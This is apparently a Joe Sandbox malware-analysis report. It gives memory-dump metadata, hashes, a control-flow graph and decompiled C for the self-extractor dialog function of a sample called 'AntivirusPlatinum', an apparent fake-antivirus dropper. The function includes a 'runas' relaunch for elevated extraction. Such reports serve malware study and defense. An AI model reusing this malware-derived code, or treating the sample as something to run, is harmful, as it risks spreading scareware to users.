                                                                                                                                                              0x00410d8c
                                                                                                                                                              0x00410d8e
                                                                                                                                                              0x00410d8e
                                                                                                                                                              0x00410d97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00410d9a
                                                                                                                                                              0x00410da3
                                                                                                                                                              0x00410daa
                                                                                                                                                              0x00410dae
                                                                                                                                                              0x00410db1
                                                                                                                                                              0x00410db6
                                                                                                                                                              0x00410db9
                                                                                                                                                              0x00410db9
                                                                                                                                                              0x00410dbc
                                                                                                                                                              0x00410dc6
                                                                                                                                                              0x00410dc7
                                                                                                                                                              0x00410dc7
                                                                                                                                                              0x00410dca
                                                                                                                                                              0x00410dca
                                                                                                                                                              0x00410dcf
                                                                                                                                                              0x00410dcf
                                                                                                                                                              0x00410dd0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00410d8e

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                              • Instruction ID: 2f23f26b4e860162697db71149469eb4a2c789a3ce5996a89fe4a76fa1262b3b
                                                                                                                                                              • Opcode Fuzzy Hash: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                              • Instruction Fuzzy Hash: DCD12370A00B449BDB349B35C8916EFB7E1AB45308F14483FE59AD7391D7BCA9C68B09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 40cc24-40cc57 call 401200 call 40309d 5 40cc5d-40cc5e 0->5 6 40d04f-40d062 0->6 7 40cc60-40cc65 5->7 8 40cc6f-40cc71 5->8 9 40d073-40d07a 6->9 10 40d064-40d06d SendMessageA 6->10 11 40cc67-40cc68 7->11 12 40ccce-40cce9 GetDlgItemTextA 7->12 13 40d335-40d339 8->13 14 40d08c-40d100 call 40ba36 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 9->14 15 40d07c-40d086 SendDlgItemMessageA 9->15 10->9 18 40cca7-40ccad 11->18 19 40cc6a-40cc6d 11->19 16 40cd08-40cd0e 12->16 17 40cceb-40ccf1 12->17 29 40d102-40d109 SetMenu 14->29 30 40d10b-40d13a SetWindowPos DestroyWindow SendMessageA 14->30 15->14 27 40cd10-40cd1d 16->27 28 40cd22-40cd34 GetDlgItem 16->28 24 40ccf3 17->24 25 40ccfd 17->25 22 40ccc1-40cccc 18->22 23 40ccaf-40ccbf 18->23 19->8 26 40cc76-40cc8d call 4098f7 call 4027d8 19->26 32 40ccff-40cd06 EndDialog 22->32 23->22 31 40cc9f-40cca2 23->31 24->25 25->32 26->31 62 40cc8f-40cc99 SetDlgItemTextA 26->62 34 40cfe6-40cfec 27->34 35 40cd36-40cd55 SendMessageA * 2 28->35 36 40cd57-40cd79 SetFocus call 4058ff 28->36 37 40d159-40d182 GetCurrentDirectoryA GetDlgItem 29->37 38 40d147-40d153 SendMessageA 30->38 39 40d13c-40d141 SendMessageA 30->39 31->13 32->31 42 40cff2-40cff8 34->42 43 40d2ab 34->43 35->36 53 40cd8b-40cda1 SetCurrentDirectoryA 36->53 54 40cd7b-40cd80 GetLastError 36->54 45 40d184 37->45 46 40d18a-40d1c1 SetWindowTextA call 40aafc call 40ca95 37->46 38->37 39->38 42->43 44 40cffe-40d01c call 4098f7 SetDlgItemTextA 42->44 51 40d2b1-40d2be call 40bf99 43->51 63 40d023-40d02f 44->63 64 40d01e-40d021 44->64 45->46 76 40d1d1-40d1d7 46->76 77 40d1c3-40d1cc call 40bf99 46->77 72 40d2c3-40d2ca 51->72 58 40cda3-40cda8 GetLastError 53->58 59 40cdae-40cdb5 call 406ea5 53->59 55 40cd82-40cd85 54->55 56 40cd87 54->56 55->53 55->56 56->53 58->59 65 40cdaa 58->65 74 40ce25-40ce27 59->74 75 40cdb7-40cdbd 59->75 62->31 69 40d032-40d04a call 4098f7 * 2 MessageBoxA 63->69 64->69 65->59 103 40d333 69->103 78 40d2d6-40d2dc 72->78 79 40d2cc-40d2d0 KiUserCallbackDispatcher 72->79 81 40ce28-40ce2b 74->81 75->74 82 40cdbf-40cdc2 75->82 84 40d234-40d23a 76->84 85 40d1d9-40d1df 76->85 77->76 86 40d2f0-40d2f7 78->86 87 40d2de-40d2eb call 40307f * 2 78->87 79->78 93 40ce31-40ce37 81->93 94 40cf4d-40cfb8 call 40b92f call 40307f * 3 call 40bf99 * 2 call 40b322 call 40bf99 81->94 95 40cdc4-40cdfd GetTickCount wsprintfA call 404ec3 call 4051d8 82->95 96 40ce3e-40ce40 82->96 97 40d2c0-40d2c2 84->97 98 40d240-40d254 call 40bf99 84->98 88 40d1e4-40d20f call 40a5e2 call 4098f7 call 40a5e2 85->88 90 40d2f9-40d2ff 86->90 91 40d31b-40d321 86->91 87->86 151 40d211-40d217 88->151 90->91 101 40d301-40d30b 90->101 91->103 104 40d323-40d32d call 4098f7 SetDlgItemTextA 91->104 106 40ce41-40ce49 93->106 107 40ce39-40ce3c 93->107 166 40cfd8-40cfe0 call 40307f 94->166 167 40cfba-40cfc0 94->167 133 40ce02-40ce07 95->133 96->106 97->72 125 40d256-40d25c 98->125 126 40d27e-40d287 98->126 112 40d315 PostMessageA 101->112 113 40d30d-40d313 SendMessageA 101->113 103->13 104->103 116 40cef0-40cf3a call 4098f7 wsprintfA call 40325c call 4098f7 MessageBoxA 106->116 117 40ce4f-40cecb GetModuleFileNameA wsprintfA ShellExecuteExA 106->117 107->106 112->91 113->91 132 40cf40-40cf48 KiUserCallbackDispatcher 116->132 117->116 123 40cecd-40ceee WaitForInputIdle Sleep 117->123 123->132 125->126 134 40d25e-40d279 call 406d54 call 40a205 125->134 126->51 130 40d289-40d2a3 DialogBoxParamA 126->130 130->51 138 40d2a5 130->138 132->103 140 40ce18-40ce23 call 405074 133->140 141 40ce09-40ce12 133->141 134->126 138->43 140->81 141->140 153 40ce14 141->153 151->84 155 40d219-40d22f call 406d54 151->155 153->140 155->84 166->34 167->166 168 40cfc2-40cfc8 167->168 168->166 170 40cfca-40cfd3 call 40bf99 168->170 170->166
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E0040CC24(void* __ecx, void* __edx, struct HWND__* _a4, struct HWND__* _a8, signed int _a11, struct HWND__* _a12, signed int _a15, intOrPtr _a16) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				struct tagPOINT _v20;
                                                                                                                                                              				struct _SHELLEXECUTEINFOA _v80;
                                                                                                                                                              				char _v1104;
                                                                                                                                                              				char _v2128;
                                                                                                                                                              				char _v2640;
                                                                                                                                                              				char _v5340;
                                                                                                                                                              				char _v5744;
                                                                                                                                                              				char _v13936;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t90;
                                                                                                                                                              				long _t91;
                                                                                                                                                              				long _t92;
                                                                                                                                                              				signed int _t106;
                                                                                                                                                              				int _t109;
                                                                                                                                                              				CHAR* _t114;
                                                                                                                                                              				signed int _t118;
                                                                                                                                                              				signed int _t128;
                                                                                                                                                              				signed int _t130;
                                                                                                                                                              				void* _t149;
                                                                                                                                                              				struct HWND__* _t152;
                                                                                                                                                              				signed int _t155;
                                                                                                                                                              				signed int _t157;
                                                                                                                                                              				signed int _t158;
                                                                                                                                                              				intOrPtr _t171;
                                                                                                                                                              				CHAR* _t172;
                                                                                                                                                              				int _t193;
                                                                                                                                                              				signed int _t201;
                                                                                                                                                              				long _t202;
                                                                                                                                                              				long _t203;
                                                                                                                                                              				long _t204;
                                                                                                                                                              				void* _t210;
                                                                                                                                                              				signed int _t214;
                                                                                                                                                              				void* _t223;
                                                                                                                                                              				intOrPtr _t224;
                                                                                                                                                              				intOrPtr _t225;
                                                                                                                                                              				struct HWND__* _t231;
                                                                                                                                                              				int _t233;
                                                                                                                                                              				void* _t235;
                                                                                                                                                              				struct HWND__* _t242;
                                                                                                                                                              				void* _t243;
                                                                                                                                                              
                                                                                                                                                              				_t230 = __edx;
                                                                                                                                                              				_t223 = __ecx;
                                                                                                                                                              				E00401200(0x366c);
                                                                                                                                                              				_t242 = _a4;
                                                                                                                                                              				E0040309D(__edx, _t242, _a8, _a12, _a16, "STARTDLG", 0, 0); // executed
                                                                                                                                                              				_t90 = _a8 - 0x110;
                                                                                                                                                              				if(_t90 == 0) {
                                                                                                                                                              					_t91 =  *0x4192d4; // 0x3d02d3
                                                                                                                                                              					 *0x419f80 = _t242;
                                                                                                                                                              					 *0x419f7c = _t242;
                                                                                                                                                              					__eflags = _t91;
                                                                                                                                                              					if(_t91 != 0) {
                                                                                                                                                              						SendMessageA(_t242, 0x80, 1, _t91);
                                                                                                                                                              					}
                                                                                                                                                              					_t92 =  *0x4192d0; // 0x72050a15
                                                                                                                                                              					__eflags = _t92;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						SendDlgItemMessageA(_t242, 0x69, 0x172, 0, _t92); // executed
                                                                                                                                                              					}
                                                                                                                                                              					E0040BA36(_t230, __eflags, _t242);
                                                                                                                                                              					_a8 = GetDlgItem(_t242, 0x67);
                                                                                                                                                              					GetWindowRect(_a8,  &_v20);
                                                                                                                                                              					MapWindowPoints(0, _t242,  &_v20, 2);
                                                                                                                                                              					_t231 = SetMenu;
                                                                                                                                                              					SetMenu(_a8, 0);
                                                                                                                                                              					_t106 = CreateWindowExA(0, "RichEdit", 0x41259a, 0x50a10844, _v20.x, _v20.y, _v12 - _v20 + 1, _v8 - _v20.y + 1, _t242, 0x67,  *0x414c78, 0); // executed
                                                                                                                                                              					_a12 = _t106;
                                                                                                                                                              					__eflags = _t106;
                                                                                                                                                              					if(_t106 != 0) {
                                                                                                                                                              						_t231 = _a12;
                                                                                                                                                              						SetWindowPos(_t231, _a8, 0, 0, 0, 0, 0x203);
                                                                                                                                                              						DestroyWindow(_a8); // executed
                                                                                                                                                              						_a8 = _t231;
                                                                                                                                                              						_t109 = SendMessageA(_t242, 0x31, 0, 0);
                                                                                                                                                              						__eflags = _t109;
                                                                                                                                                              						if(_t109 != 0) {
                                                                                                                                                              							SendMessageA(_t231, 0x30, _t109, 0);
                                                                                                                                                              						}
                                                                                                                                                              						SendMessageA(_t231, 0x435, 0, 0x400000);
                                                                                                                                                              					} else {
                                                                                                                                                              						SetMenu(_a8, 0x67);
                                                                                                                                                              					}
                                                                                                                                                              					GetCurrentDirectoryA(0x400,  &_v2128);
                                                                                                                                                              					_a12 = GetDlgItem(_t242, 0x65);
                                                                                                                                                              					_t114 = 0x419f92;
                                                                                                                                                              					__eflags =  *0x419f92; // 0x0
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						_t114 =  &_v2128;
                                                                                                                                                              					}
                                                                                                                                                              					SetWindowTextA(_a12, _t114); // executed
                                                                                                                                                              					E0040AAFC(_t223, __eflags, _a12); // executed
                                                                                                                                                              					 *0x41a814 = 0; // executed
                                                                                                                                                              					E0040CA95(0, _t230, _t231, _t242, __eflags, "C:\Users\engineer\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\engineer\Desktop\Endermanch@AntivirusPlatinum.exe", 0x41a818, 0x41a824); // executed
                                                                                                                                                              					__eflags =  *0x41a824;
                                                                                                                                                              					if( *0x41a824 > 0) {
                                                                                                                                                              						E0040BF99(_t230, _t242, _t242,  *0x41a818, 7); // executed
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *0x41a814;
                                                                                                                                                              					if( *0x41a814 != 0) {
                                                                                                                                                              						L75:
                                                                                                                                                              						__eflags =  *0x41a824;
                                                                                                                                                              						if( *0x41a824 <= 0) {
                                                                                                                                                              							_t233 = 1;
                                                                                                                                                              							__eflags = 1;
                                                                                                                                                              							L85:
                                                                                                                                                              							__eflags =  *0x419f8c - 2;
                                                                                                                                                              							if( *0x419f8c == 2) {
                                                                                                                                                              								EnableWindow(_a12, 0);
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *0x419f88; // 0x0
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								E0040307F(_t242, 0x66, 0);
                                                                                                                                                              								E0040307F(_t242, 0x65, 0);
                                                                                                                                                              							}
                                                                                                                                                              							_t118 =  *0x419f8c; // 0x2
                                                                                                                                                              							__eflags = _t118;
                                                                                                                                                              							if(_t118 != 0) {
                                                                                                                                                              								__eflags =  *0x419f78; // 0x2
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									_push(0);
                                                                                                                                                              									_push(_t233);
                                                                                                                                                              									_push(0x111);
                                                                                                                                                              									_push(_t242);
                                                                                                                                                              									__eflags = _t118 - _t233;
                                                                                                                                                              									if(_t118 != _t233) {
                                                                                                                                                              										PostMessageA();
                                                                                                                                                              									} else {
                                                                                                                                                              										SendMessageA();
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *0x419f68; // 0x0
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                              							}
                                                                                                                                                              							L96:
                                                                                                                                                              							return _t233;
                                                                                                                                                              						}
                                                                                                                                                              						E0040BF99(_t230, _t242, _t242,  *0x41a818, 0); // executed
                                                                                                                                                              						_t128 =  *0x41a81c;
                                                                                                                                                              						__eflags = _t128;
                                                                                                                                                              						if(_t128 != 0) {
                                                                                                                                                              							__eflags =  *0x419f8c; // 0x2
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_t224 =  *0x418ecc; // 0x0
                                                                                                                                                              								E00406D54(_t224,  *0x414c74, _a8, _t128);
                                                                                                                                                              								E0040A205( *0x41a81c);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t233 = 1;
                                                                                                                                                              						__eflags =  *0x419f8c - _t233; // 0x2
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							L83:
                                                                                                                                                              							E0040BF99(_t230, _t242, _t242,  *0x41a818, _t233);
                                                                                                                                                              							goto L85;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t130 = DialogBoxParamA( *0x414c74, "LICENSEDLG", 0, E0040CB2B, 0); // executed
                                                                                                                                                              							__eflags = _t130;
                                                                                                                                                              							if(_t130 != 0) {
                                                                                                                                                              								goto L83;
                                                                                                                                                              							}
                                                                                                                                                              							 *0x419f78 = 1;
                                                                                                                                                              							L82:
                                                                                                                                                              							_push(_t233);
                                                                                                                                                              							L45:
                                                                                                                                                              							EndDialog(_t242, ??); // executed
                                                                                                                                                              							goto L96;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_v13936 = 0;
                                                                                                                                                              						_t235 = 0x96;
                                                                                                                                                              						do {
                                                                                                                                                              							E0040A5E2( &_v13936, " ");
                                                                                                                                                              							E0040A5E2( &_v13936, E004098F7(_t235));
                                                                                                                                                              							_t235 = _t235 + 1;
                                                                                                                                                              							__eflags = _t235 - 0x9b;
                                                                                                                                                              						} while (_t235 <= 0x9b);
                                                                                                                                                              						__eflags =  *0x419f8c; // 0x2
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							_t225 =  *0x418ecc; // 0x0
                                                                                                                                                              							E00406D54(_t225,  *0x414c74, _a8,  &_v13936);
                                                                                                                                                              						}
                                                                                                                                                              						goto L75;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_t90 != 1) {
                                                                                                                                                              					L5:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t149 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t149 == 0) {
                                                                                                                                                              					GetDlgItemTextA(_t242, 0x65,  &_v1104, 0x400);
                                                                                                                                                              					__eflags =  *0x419f70; // 0x0
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						__eflags =  *0x419f68; // 0x0
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							_t152 = GetDlgItem(_t242, 0x67);
                                                                                                                                                              							_a8 = _t152;
                                                                                                                                                              							__eflags =  *0x419f74; // 0x0
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								SendMessageA(_t152, 0xb1, 0, 0xffffffff);
                                                                                                                                                              								SendMessageA(_a8, 0xc2, 0, 0x41259a);
                                                                                                                                                              							}
                                                                                                                                                              							SetFocus(_a8);
                                                                                                                                                              							_a11 = 0;
                                                                                                                                                              							_t155 = E004058FF(0, _t242,  &_v1104, 0, 0);
                                                                                                                                                              							__eflags = _t155;
                                                                                                                                                              							if(_t155 != 0) {
                                                                                                                                                              								L25:
                                                                                                                                                              								_t157 = SetCurrentDirectoryA( &_v1104); // executed
                                                                                                                                                              								__eflags = _t157;
                                                                                                                                                              								_a15 = _t157 != 0;
                                                                                                                                                              								__eflags = _a15;
                                                                                                                                                              								if(_a15 == 0) {
                                                                                                                                                              									_t203 = GetLastError();
                                                                                                                                                              									__eflags = _t203 - 5;
                                                                                                                                                              									if(_t203 == 5) {
                                                                                                                                                              										_a11 = 1;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t158 = E00406EA5();
                                                                                                                                                              								__eflags = _t158;
                                                                                                                                                              								if(_t158 == 0) {
                                                                                                                                                              									L35:
                                                                                                                                                              									_t233 = 1;
                                                                                                                                                              									__eflags = 1;
                                                                                                                                                              									L36:
                                                                                                                                                              									__eflags = _a15;
                                                                                                                                                              									if(_a15 != 0) {
                                                                                                                                                              										E0040B92F(_t242,  &_v1104); // executed
                                                                                                                                                              										 *0x419f6c = _t233;
                                                                                                                                                              										E0040307F(_t242, 0x66, 0);
                                                                                                                                                              										E0040307F(_t242, 0x65, 0);
                                                                                                                                                              										E0040307F(_t242, _t233, 0);
                                                                                                                                                              										E0040BF99(_t230, _t242, _t242,  *0x41a818, 5);
                                                                                                                                                              										E0040BF99(_t230, _t242, _t242,  *0x41a818, 2);
                                                                                                                                                              										E0040B322(_t230, __eflags, "C:\Users\engineer\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\engineer\Desktop\Endermanch@AntivirusPlatinum.exe"); // executed
                                                                                                                                                              										E0040BF99(_t230, _t242, _t242,  *0x41a818, 6);
                                                                                                                                                              										__eflags =  *0x419f78; // 0x2
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											__eflags =  *0x419f74; // 0x0
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												__eflags =  *0x41a828;
                                                                                                                                                              												if( *0x41a828 == 0) {
                                                                                                                                                              													E0040BF99(_t230, _t242, 0,  *0x41a818, 4); // executed
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										E0040307F(_t242, _t233, _t233);
                                                                                                                                                              										 *0x419f6c = 0;
                                                                                                                                                              										goto L51;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *0x419f91; // 0x0
                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                              										_a11 = 0;
                                                                                                                                                              									}
                                                                                                                                                              									L40:
                                                                                                                                                              									__eflags = _a11;
                                                                                                                                                              									__eflags = _t158 & 0xffffff00 | _a11 == 0x00000000;
                                                                                                                                                              									if((_t158 & 0xffffff00 | _a11 == 0x00000000) != 0) {
                                                                                                                                                              										L43:
                                                                                                                                                              										wsprintfA( &_v2640, "\"%s\"\n%s",  &_v1104, E004098F7(0x82));
                                                                                                                                                              										E0040325C(0x414c7c, _t233);
                                                                                                                                                              										MessageBoxA(_t242,  &_v2640, E004098F7(0x7e), 0x30);
                                                                                                                                                              										 *0x419f74 =  *0x419f74 + 1;
                                                                                                                                                              										__eflags =  *0x419f74;
                                                                                                                                                              										L44:
                                                                                                                                                              										_push(0);
                                                                                                                                                              										goto L45;
                                                                                                                                                              									}
                                                                                                                                                              									GetModuleFileNameA(0,  &_v2128, 0x400);
                                                                                                                                                              									wsprintfA( &_v5340, "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"",  &_v1104, 0x41a792, 0x41a392);
                                                                                                                                                              									_v80.lpFile =  &_v2128;
                                                                                                                                                              									_v80.lpParameters =  &_v5340;
                                                                                                                                                              									_t243 = _t243 + 0x14;
                                                                                                                                                              									_v80.cbSize = 0x3c;
                                                                                                                                                              									_v80.fMask = 0x40;
                                                                                                                                                              									_v80.hwnd = _t242;
                                                                                                                                                              									_v80.lpVerb = "runas";
                                                                                                                                                              									_v80.lpDirectory = 0x412340;
                                                                                                                                                              									_v80.nShow = _t233;
                                                                                                                                                              									_v80.hInstApp = 0;
                                                                                                                                                              									_t193 = ShellExecuteExA( &_v80);
                                                                                                                                                              									__eflags = _t193;
                                                                                                                                                              									if(_t193 == 0) {
                                                                                                                                                              										goto L43;
                                                                                                                                                              									}
                                                                                                                                                              									WaitForInputIdle(_v80.hProcess, 0x2710);
                                                                                                                                                              									Sleep(0x1f4);
                                                                                                                                                              									 *0x41a828 = _v80.hProcess;
                                                                                                                                                              									goto L44;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x419f91; // 0x0
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									goto L35;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _a15;
                                                                                                                                                              								if(_a15 == 0) {
                                                                                                                                                              									_t233 = 1;
                                                                                                                                                              									__eflags = 1;
                                                                                                                                                              									goto L40;
                                                                                                                                                              								}
                                                                                                                                                              								wsprintfA( &_v2128, "__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                                                                                                              								_t243 = _t243 + 0xc;
                                                                                                                                                              								E00404EC3( &_v5744);
                                                                                                                                                              								_t233 = 1;
                                                                                                                                                              								_t201 = E004051D8( &_v5744,  &_v2128, 0, 1); // executed
                                                                                                                                                              								_a15 = _t201;
                                                                                                                                                              								__eflags = _t201;
                                                                                                                                                              								if(_t201 == 0) {
                                                                                                                                                              									_t202 = GetLastError();
                                                                                                                                                              									__eflags = _t202 - 5;
                                                                                                                                                              									if(_t202 == 5) {
                                                                                                                                                              										_a11 = 1;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								_t158 = E00405074(0,  &_v5744);
                                                                                                                                                              								goto L36;
                                                                                                                                                              							}
                                                                                                                                                              							_t204 = GetLastError();
                                                                                                                                                              							__eflags = _t204 - 5;
                                                                                                                                                              							if(_t204 == 5) {
                                                                                                                                                              								L24:
                                                                                                                                                              								_a11 = 1;
                                                                                                                                                              								goto L25;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t204 - 3;
                                                                                                                                                              							if(_t204 != 3) {
                                                                                                                                                              								goto L25;
                                                                                                                                                              							}
                                                                                                                                                              							goto L24;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *0x419f78 = 2;
                                                                                                                                                              							_t233 = 1;
                                                                                                                                                              							L51:
                                                                                                                                                              							__eflags =  *0x419f74; // 0x0
                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                              								goto L82;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *0x419f78; // 0x2
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								goto L82;
                                                                                                                                                              							}
                                                                                                                                                              							 *0x419f70 = _t233;
                                                                                                                                                              							SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                              							_t171 =  *0x414c7c; // 0x0
                                                                                                                                                              							__eflags = _t171 - 9;
                                                                                                                                                              							if(_t171 != 9) {
                                                                                                                                                              								__eflags = _t171 - 3;
                                                                                                                                                              								_t222 = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                              								__eflags = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t54 = _t171 + 0x7a; // 0x7a
                                                                                                                                                              								_t222 = _t54;
                                                                                                                                                              							}
                                                                                                                                                              							_t172 = E004098F7(0x7e);
                                                                                                                                                              							MessageBoxA(_t242, E004098F7(_t222), _t172, 0x30);
                                                                                                                                                              							goto L96;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						__eflags =  *0x419f68; // 0x0
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							 *0x419f78 = 2;
                                                                                                                                                              						}
                                                                                                                                                              						_push(1);
                                                                                                                                                              						L16:
                                                                                                                                                              						EndDialog(_t242, ??);
                                                                                                                                                              						L8:
                                                                                                                                                              						return 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t210 = _t149 - 1;
                                                                                                                                                              				if(_t210 == 0) {
                                                                                                                                                              					__eflags =  *0x419f6c; // 0x0
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						L11:
                                                                                                                                                              						 *0x419f78 = 2;
                                                                                                                                                              						_push(0);
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					 *0x419f78 = 1;
                                                                                                                                                              					__eflags =  *0x419f74; // 0x0
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						goto L8;
                                                                                                                                                              					}
                                                                                                                                                              					goto L11;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t210 == 0x64) {
                                                                                                                                                              					_t214 = E004027D8(_t242, E004098F7(0x64),  &_v1104);
                                                                                                                                                              					__eflags = _t214;
                                                                                                                                                              					if(_t214 != 0) {
                                                                                                                                                              						SetDlgItemTextA(_t242, 0x65,  &_v1104);
                                                                                                                                                              					}
                                                                                                                                                              					goto L8;
                                                                                                                                                              				}
                                                                                                                                                              				goto L5;
                                                                                                                                                              			}















































                                                                                                                                                              0x0040cc24
                                                                                                                                                              0x0040cc24
                                                                                                                                                              0x0040cc2c
                                                                                                                                                              0x0040cc33
                                                                                                                                                              0x0040cc4a
                                                                                                                                                              0x0040cc52
                                                                                                                                                              0x0040cc57
                                                                                                                                                              0x0040d04f
                                                                                                                                                              0x0040d054
                                                                                                                                                              0x0040d05a
                                                                                                                                                              0x0040d060
                                                                                                                                                              0x0040d062
                                                                                                                                                              0x0040d06d
                                                                                                                                                              0x0040d06d
                                                                                                                                                              0x0040d073
                                                                                                                                                              0x0040d078
                                                                                                                                                              0x0040d07a
                                                                                                                                                              0x0040d086
                                                                                                                                                              0x0040d086
                                                                                                                                                              0x0040d08d
                                                                                                                                                              0x0040d09b
                                                                                                                                                              0x0040d0a5
                                                                                                                                                              0x0040d0b3
                                                                                                                                                              0x0040d0b9
                                                                                                                                                              0x0040d0c3
                                                                                                                                                              0x0040d0f5
                                                                                                                                                              0x0040d0fb
                                                                                                                                                              0x0040d0fe
                                                                                                                                                              0x0040d100
                                                                                                                                                              0x0040d10b
                                                                                                                                                              0x0040d11b
                                                                                                                                                              0x0040d124
                                                                                                                                                              0x0040d12f
                                                                                                                                                              0x0040d132
                                                                                                                                                              0x0040d138
                                                                                                                                                              0x0040d13a
                                                                                                                                                              0x0040d141
                                                                                                                                                              0x0040d141
                                                                                                                                                              0x0040d153
                                                                                                                                                              0x0040d102
                                                                                                                                                              0x0040d107
                                                                                                                                                              0x0040d107
                                                                                                                                                              0x0040d165
                                                                                                                                                              0x0040d174
                                                                                                                                                              0x0040d177
                                                                                                                                                              0x0040d17c
                                                                                                                                                              0x0040d182
                                                                                                                                                              0x0040d184
                                                                                                                                                              0x0040d184
                                                                                                                                                              0x0040d18e
                                                                                                                                                              0x0040d197
                                                                                                                                                              0x0040d1b0
                                                                                                                                                              0x0040d1b6
                                                                                                                                                              0x0040d1bb
                                                                                                                                                              0x0040d1c1
                                                                                                                                                              0x0040d1cc
                                                                                                                                                              0x0040d1cc
                                                                                                                                                              0x0040d1d1
                                                                                                                                                              0x0040d1d7
                                                                                                                                                              0x0040d234
                                                                                                                                                              0x0040d234
                                                                                                                                                              0x0040d23a
                                                                                                                                                              0x0040d2c2
                                                                                                                                                              0x0040d2c2
                                                                                                                                                              0x0040d2c3
                                                                                                                                                              0x0040d2c3
                                                                                                                                                              0x0040d2ca
                                                                                                                                                              0x0040d2d0
                                                                                                                                                              0x0040d2d0
                                                                                                                                                              0x0040d2d6
                                                                                                                                                              0x0040d2dc
                                                                                                                                                              0x0040d2e2
                                                                                                                                                              0x0040d2eb
                                                                                                                                                              0x0040d2eb
                                                                                                                                                              0x0040d2f0
                                                                                                                                                              0x0040d2f5
                                                                                                                                                              0x0040d2f7
                                                                                                                                                              0x0040d2f9
                                                                                                                                                              0x0040d2ff
                                                                                                                                                              0x0040d301
                                                                                                                                                              0x0040d302
